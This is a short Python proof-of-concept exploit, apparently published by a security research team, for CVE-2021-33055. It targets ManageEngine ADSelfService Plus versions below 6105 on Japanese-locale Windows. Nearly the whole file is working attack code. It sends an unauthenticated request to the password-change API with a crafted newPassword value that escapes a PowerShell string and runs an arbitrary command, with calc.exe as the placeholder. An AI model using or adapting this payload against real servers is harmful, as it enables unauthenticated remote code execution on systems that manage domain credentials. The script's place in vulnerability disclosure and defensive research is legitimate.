#
# STM Cyber R&D
# https://blog.stmcyber.com
#
# Exploit Title: ManageEngine ADSelfService Plus - Unauthenticated RCE via PowerShell injection (system locale dependant)
# Exploit Author: Krzysztof Andrusiak, Marcin Ogorzelski
# Vendor Homepage: https://www.manageengine.com/
# Software Link: https://www.manageengine.com/products/self-service-password/download.html
# Version: < 6105
# Tested on: Windows Server 2019
# CVE: CVE-2021-33055
# Note: PoC for ADSSP installed on Japanese Windows.

import requests

URL = 'http://x.x.x.x:8888'
DOMAIN = 'ALPHACORP.LOCAL'
CMD = 'calc.exe'

QUOTATION_MARK = b"\xc2\x81h" # on Japanese systems with ADSSP it will be decoded into ﾂ” (U+FF82 and U+201D)
payload = QUOTATION_MARK + b";" + CMD.encode("utf-8") + b"; echo " + QUOTATION_MARK + b"A" * 256

params = {
    'operation': 'UMCP',
    'loginName': 'krbtgt', # any valid username
    'domainName': DOMAIN,
    'umcp': 'true',
    'IS_ENCRYPTED': 'false',
    'oldPassword': 'whatever',
    'newPassword': payload
}

try:
    requests.get(URL.rstrip('/') + '/RestAPI/ChangePasswordAPI', params=params, timeout=5, verify=False)
    print("[-] Something went wrong.")
except requests.exceptions.ReadTimeout:
    print("[+] Done.")